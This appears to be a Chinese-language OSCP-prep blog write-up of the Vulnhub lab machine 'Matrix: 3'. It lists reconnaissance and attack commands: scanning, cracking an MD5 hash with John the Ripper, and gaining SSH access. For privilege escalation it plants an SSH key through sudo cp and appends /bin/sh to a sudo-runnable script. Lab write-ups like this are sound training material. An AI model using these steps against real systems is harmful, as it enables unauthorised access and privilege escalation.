OSCP备考_0x16_Vulnhub靶机_Matrix: 3

Ethan医生2周前靶场32
名称说明
靶机下载链接https://www.vulnhub.com/entry/matrix-3,326/
攻击机(kali)ip:192.168.233.168
靶机(CentOS)ip:192.168.233.183

arp-scan 192.168.233.1/24

image.png











nmap -p80,6464,7331 -A -T4 192.168.233.183

image.png

image.png


gobuster dir -u http://192.168.233.183 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,txt,html

image.png


扫描出来访问看看 遇到这种有啥door的 可以访问页面看看

image.png


http://192.168.233.183/Matrix/

image.png

好多文件夹,一个一个点太慢了 

wget -c -r -np -k -L -p http://192.168.233.183/Matrix/,直接递归下载

image.png

将目录下的index.html查看文件内的A标签全部打印出来

find /path/to/directory -type f -name "*.html" -exec grep -oP '<a\s+[^>]*>.*?</a>' {} \;

image.png

将挡案下载解压

image.png

后面那串应该是啥加密试试看是不是admin密码,密码就是passwd

john --wordlist=/usr/share/wordlists/rockyou.txt secret.txt --format=Raw-MD5

image.png

用来登入http://192.168.233.183:7331/ 试试看,果然登入了

image.png

image.png

http://192.168.233.183:7331/data/ 里面有个data下载下来


image.png

windows

Windows 通常會以 Unicode 寬字節的方式儲存,所以需要加參數 --encoding={b,l}

strings data --encoding={b,l}

image.png

前面有6464可以进行SSH登入 尝试看看7R1n17yN30

image.png

ssh guest@192.168.233.183 -p 6464 -t "bash --noprofile"

image.png

image.png

image.png

需要到trinity底下进行查看

OpenSSH_7.7p1, OpenSSL 1.0.2o  27 Mar 2018

发现可以使用ssh-keygen

然后去到trinity的用户目录下发现具有ssh

同时使用sudo -l发现可以通过sudo执行cp命令

那就用ssh覆盖,然后登录用户trinity

ssh-keygen

image.png

密钥生成成功

给执行权限chmod 777 trinity.pub

然后将公钥复制到trinity用户的ssh下的authorized_keys

sudo -u trinity /bin/cp trinity.pub /home/trinity/.ssh/authorized_keys

image.png

将私钥保存到本地

image.png

ssh -p 6464 trinity@192.168.233.183 -i id-rsa

image.png

sudo -l

echo '/bin/sh' >> oracle

chmod 777 oracle 

回到根目录 直接执行sudo /home/trinity/oracle

image.png

标签: OSCP

相关文章

OSCP备考_0x10_HackThBox靶机_Linux_Sunday

OSCP备考_0x10_HackThBox靶机_Linux_Sunday

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.252.243 (扫描TCP)nmap -sU --top-ports 100 10.129.25...

OSCP备考_0x14_Vulnhub靶机_Raven: 2

OSCP备考_0x14_Vulnhub靶机_Raven: 2

名称说明靶机下载链接https://www.vulnhub.com/entry/raven-2,269/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192.168....

OSCP备考_0x16_HackThBox靶机_Linux_jarvis

OSCP备考_0x16_HackThBox靶机_Linux_jarvis

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.229.137 (扫描TCP)nmap -sU --top-ports 100 ...

OSCP备考_0x06_HackThBox靶机_Linux_Sense

OSCP备考_0x06_HackThBox靶机_Linux_Sense

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.131.103 (扫描TCP)上面的信息提供了直接跳转到443端口nmap -sU --top-ports...

OSCP备考_0x19_HackThBox靶机_Linux_haircut

OSCP备考_0x19_HackThBox靶机_Linux_haircut

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.82.246 (扫描TCP)        &n...

OSCP备考_0x29_HackThBox靶机_Linux_tabby

OSCP备考_0x29_HackThBox靶机_Linux_tabby

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.173.82 (扫描TCP)nmap -sU --top-ports 100 ...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。